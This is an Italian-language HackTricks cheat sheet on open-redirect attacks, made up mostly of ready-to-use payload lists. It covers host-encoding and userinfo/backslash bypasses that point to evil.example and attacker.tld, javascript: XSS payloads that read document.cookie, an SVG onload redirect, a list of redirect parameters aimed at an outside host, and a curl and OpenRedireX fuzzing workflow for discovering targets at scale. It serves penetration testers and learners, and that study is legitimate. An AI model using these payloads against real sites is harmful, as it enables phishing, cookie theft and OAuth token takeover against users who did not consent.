Open Redirect

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

Controlla i piani di abbonamento!

Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.

Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos github.

Open redirect

Reindirizzamento a localhost o domini arbitrari

Se l’app “consente solo host interni/whitelisted”, prova notazioni alternative dell’host per colpire il loopback o gli intervalli interni tramite il target del redirect:
IPv4 loopback variants: 127.0.0.1, 127.1, 2130706433 (decimal), 0x7f000001 (hex), 017700000001 (octal)
IPv6 loopback variants: [::1], [0:0:0:0:0:0:0:1], [::ffff:127.0.0.1]
Trailing dot and casing: localhost., LOCALHOST, 127.0.0.1.
Wildcard DNS that resolves to loopback: lvh.me, sslip.io (e.g., 127.0.0.1.sslip.io), traefik.me, localtest.me. Questi sono utili quando sono permessi solo i “sottodomini di X” ma la risoluzione host punta comunque a 127.0.0.1.
Network-path references spesso bypassano validator ingenui che antepongono uno scheme o controllano solo i prefissi:
//attacker.tld → interpretato come scheme-relative e naviga fuori sito usando lo schema corrente.
Userinfo tricks bypassano i controlli contains/startswith contro host trusted:
https://trusted.tld@attacker.tld/ → il browser naviga su attacker.tld ma i semplici controlli di stringa “vedono” trusted.tld.
Confusione nel parsing della backslash tra framework/browser:
https://trusted.tld@attacker.tld → alcuni backend trattano “\” come un carattere di path e superano la validazione; i browser normalizzano a “/” e interpretano trusted.tld come userinfo, inviando gli utenti a attacker.tld. Questo appare anche in mismatch tra URL-parser di Node/PHP.

URL Format Bypass

Modern open-redirect to XSS pivots

#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)

#Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)

# Abuse bad subdomain filter
javascript://sub.domain.com/%0Aalert(1)

#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL os PHP
javascript://%250Aalert(1)

#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0

#Others
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//

Payload di bypass URL-based più moderni

```text # Scheme-relative (current scheme is reused) //evil.example

Credentials (userinfo) trick

https://trusted.example@evil.example/

Backslash confusion (server validates, browser normalizes)

https://trusted.example@evil.example/

Schemeless with whitespace/control chars

evil.example%00 %09//evil.example

Prefix/suffix matching flaws

https://trusted.example.evil.example/ https://evil.example/trusted.example

When only path is accepted, try breaking absolute URL detection

/\evil.example /..//evil.example

</details>

## Open Redirect caricamento file svg
```html
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>
</code>

Parametri comuni di injection

/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://c1h2e1.github.io
data=https://c1h2e1.github.io
qurl=https://c1h2e1.github.io
login=https://c1h2e1.github.io
logout=https://c1h2e1.github.io
ext=https://c1h2e1.github.io
clickurl=https://c1h2e1.github.io
goto=https://c1h2e1.github.io
rit_url=https://c1h2e1.github.io
forward_url=https://c1h2e1.github.io
@https://c1h2e1.github.io
forward=https://c1h2e1.github.io
pic=https://c1h2e1.github.io
callback_url=https://c1h2e1.github.io
jump=https://c1h2e1.github.io
jump_url=https://c1h2e1.github.io
click?u=https://c1h2e1.github.io
originUrl=https://c1h2e1.github.io
origin=https://c1h2e1.github.io
Url=https://c1h2e1.github.io
desturl=https://c1h2e1.github.io
u=https://c1h2e1.github.io
page=https://c1h2e1.github.io
u1=https://c1h2e1.github.io
action=https://c1h2e1.github.io
action_url=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
sp_url=https://c1h2e1.github.io
service=https://c1h2e1.github.io
recurl=https://c1h2e1.github.io
j?url=https://c1h2e1.github.io
url=//https://c1h2e1.github.io
uri=https://c1h2e1.github.io
u=https://c1h2e1.github.io
allinurl:https://c1h2e1.github.io
q=https://c1h2e1.github.io
link=https://c1h2e1.github.io
src=https://c1h2e1.github.io
tc?src=https://c1h2e1.github.io
linkAddress=https://c1h2e1.github.io
location=https://c1h2e1.github.io
burl=https://c1h2e1.github.io
request=https://c1h2e1.github.io
backurl=https://c1h2e1.github.io
RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io

Esempi di codice

.Net

response.redirect("~/mysafe-subdomain/login.aspx")

Java

response.redirect("http://mysafedomain.com");

PHP

<?php
/* browser redirections*/
header("Location: http://mysafedomain.com");
exit;
?>

Flusso di lavoro per Hunting e exploitation (pratico)

Controllo di un singolo URL con curl:

curl -s -I "https://target.tld/redirect?url=//evil.example" | grep -i "^Location:"

Individua e fuzz i parametri probabili su larga scala:

Clicca per espandere

```bash # 1) Gather historical URLs, keep those with common redirect params cat domains.txt \ | gau --o urls.txt # or: waybackurls / katana / hakrawler

2) Grep common parameters and normalize list

3) Use OpenRedireX to fuzz with payload corpus

cat candidates.txt | openredirex -p payloads.txt -k FUZZ -c 50 > results.txt

4) Manually verify interesting hits

awk ‘/30[1237]|Location:/I’ results.txt

</details>

- Non dimenticare i sink client-side nelle SPAs: cerca window.location/assign/replace e gli helper del framework che leggono query/hash e reindirizzano.

- I framework spesso introducono footguns quando le destinazioni di redirect sono derivate da input non attendibili (query params, Referer, cookies). Vedi le note su Next.js relative ai redirect ed evita destinazioni dinamiche derivate dall'input utente.

<a class="content_ref" href="../network-services-pentesting/pentesting-web/nextjs.md"><span class="content_ref_label">NextJS</span></a>

- Flussi OAuth/OIDC: l'abuso di open redirectors spesso sfocia in account takeover tramite leak di authorization codes/tokens. Vedi la guida dedicata:

<a class="content_ref" href="./oauth-to-account-takeover.md"><span class="content_ref_label">OAuth to Account takeover</span></a>

- Le risposte server che implementano redirect senza Location (meta refresh/JavaScript) sono comunque sfruttabili per phishing e possono talvolta essere concatenati. Grep per:
```html
<meta http-equiv="refresh" content="0;url=//evil.example">
<script>location = new URLSearchParams(location.search).get('next')</script>

Strumenti

https://github.com/0xNanda/Oralyzer
OpenRedireX – fuzzer per rilevare open redirects. Esempio:

# Install
git clone https://github.com/devanshbatham/OpenRedireX && cd OpenRedireX && ./setup.sh

# Fuzz a list of candidate URLs (use FUZZ as placeholder)
cat list_of_urls.txt | ./openredirex.py -p payloads.txt -k FUZZ -c 50

Riferimenti

In https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect puoi trovare liste di fuzzing.
https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html
https://github.com/cujanovic/Open-Redirect-Payloads
https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a
PortSwigger Web Security Academy – DOM-based open redirection: https://portswigger.net/web-security/dom-based/open-redirection
OpenRedireX – Un fuzzer per rilevare open redirect vulnerabilities: https://github.com/devanshbatham/OpenRedireX

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

Controlla i piani di abbonamento!

Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.

Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos github.